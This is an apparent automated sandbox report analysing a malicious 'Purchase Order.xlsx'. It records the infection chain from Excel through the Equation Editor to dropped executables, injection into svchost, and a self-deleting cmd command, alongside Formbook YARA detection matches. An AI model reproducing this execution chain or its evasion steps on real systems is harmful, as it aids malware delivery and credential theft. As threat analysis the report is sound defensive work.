          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C3A37B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF2305
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF7353
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C25485
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C01489
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C2D47D
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C7443E
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C0C5F0
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C36540
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF351F
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF4680
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BFE6C1
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C92622
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C3A634
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C257C3
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BFC7BC
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C7579A
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C8F8EE
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C1286D
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BFC85C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BF29B2
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C069FE
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C9098E
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C7394B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C75955
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00CA3A83
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C7DBDA
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BEFBD7
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C9CBA4
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C17B00
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C8FDDD
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00BFCD5B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C20D3B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C0EE4C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C22E2F
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C62FDC
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C8CFB1
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C1DF7C
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_2_00C00F3F
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00401030
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041C3A2
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B4B6
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041C7FE
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041B871
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041CBC6
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041BBDB
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041BC4D
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00408C6B
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00408C70
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00408C2A
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041BCF3
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_0041BD21
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00402D89
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00402D90
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: 6_1_00402FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085E0C6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0088D005
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00863040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0087905A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085E2E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00901238
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_009063BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085F3CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008863DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00862305
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00867353
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008AA37B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00895485
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00871489
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008E443E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0089D47D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0087C5F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086351F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008A6540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00864680
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086E6C1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00902622
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008AA634
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008E579A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086C7BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008957C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008FF8EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086C85C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0088286D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0090098E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008629B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008769FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008E394B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008E5955
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00913A83
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0090CBA4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0085FBD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008EDBDA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00887B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008FFDDD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00890D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0086CD5B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00892E2F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0087EE4C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008FCFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_008D2FDC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00870F3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0088DF7C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009B4B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009C7FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009B871
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009CBC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009BBDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00088C2A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0009BC4D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00088C6B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00088C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00082D89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00082D90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00082FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007867C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00785062
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007832FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00781362
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00783302
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007875B2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_007808F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00780902
          Source: Purchase Order.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00419F80 appears 46 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00C33F92 appears 132 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00BEDF5C appears 119 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00C3373B appears 244 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00BEE2A8 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exeCode function: String function: 00C5F970 appears 84 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0085E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008CF970 appears 84 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008A373B appears 245 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 008A3F92 appears 132 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0085DF5C appears 120 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: String function: 03C1E35C appears 96 times
          Source: scancopy87867678[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: acqyswhf.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: dtz25z5e9sr.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@12/12@12/8
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C3A6AD GetLastError,FormatMessageW,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeCode function: 5_2_00C3443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Purchase Order.xlsxJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD39.tmpJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Purchase Order.xlsxReversingLabs: Detection: 23%
          Source: acqyswhf.exeString found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
          Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
          Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exeProcess created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Purchase Order.xlsxStatic file information: File size 2507264 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: acqyswhf.exe, dtz25z5e9sr.exe, svchost.exe
